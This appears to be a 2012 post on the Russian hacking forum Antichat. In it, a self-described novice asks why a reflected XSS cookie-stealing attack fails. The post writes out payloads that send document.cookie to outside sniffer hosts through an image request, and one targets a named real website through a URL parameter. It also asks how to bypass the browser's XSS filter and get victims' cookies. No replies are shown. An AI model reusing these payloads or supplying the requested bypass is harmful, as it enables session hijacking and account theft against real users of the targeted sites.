HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.05.2012, 01:00
MashaRomanova
Новичок
Регистрация: 29.05.2012
Сообщений: 5
С нами: 7345046

Репутация: 0
По умолчанию

Привет кул хакеры . Я в этом деле новичек , поэтому не глумитесь Прошу растолковать чего .

Пытаюсь сделать пассивную xss :
Пишу что - то вроде vk.com/hackMe/it_is_our_xss.php?yourXSS=
img = new Image(); img.src = "http://kartinkaSniffer.ru/kggg.gif?"+document.cookie;

В результате эксплорер пишет : выполнение скрипта остановленно для того чтобы спасти вас от своей же xss для ее проверки . Через другие браузеры сообщений с ошибкой нету , но на сниффер ничего не приходит .
__________________________________________________ ____________
Конкретный пример ( Уязвимость с antichat )

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert(' xz che za')

Браузер останавливает выполнение скрипта .

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">
img = new Image(); img.src = "http://httpz.ru/nv62w35bb1k.gif?"+document.cookie;

Тоже самое и в этом случае ( осторожно ссылка на мой сниффер )

Даже если я кодирую свой xss через http://ha.ckers.org/xss.html всеравно , на лог сниффера ничего не приходит , хоть и ошибки в браузере не вылезает .

Даже самого себя взломать не могу ((( Печаль
__________________________________________________ _______________

Вопрос :
1)Все ли правильно я делал в xss атаке , до проблеммы с браузером ?
2) Если ответ на первый вопрос " да " , то как обойти этот браузер и будет ли работать ( тоесть получу ли я свои куки ) если ссылка будет открыта через старый браузер ?
3) Самостоятельно я еще не находил пассивную xss , все брал форумов . Правильно ли я понял что если при отправке вот этого vk.com/hackDurov.php?enterXSS=alert('YouAreCoolHacker') вылезет табличка javascript , это значит что в этом месте можно уязвимость и можно внедрять любой html код .
__________________________________________________ __________

Заранее спасибо .
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.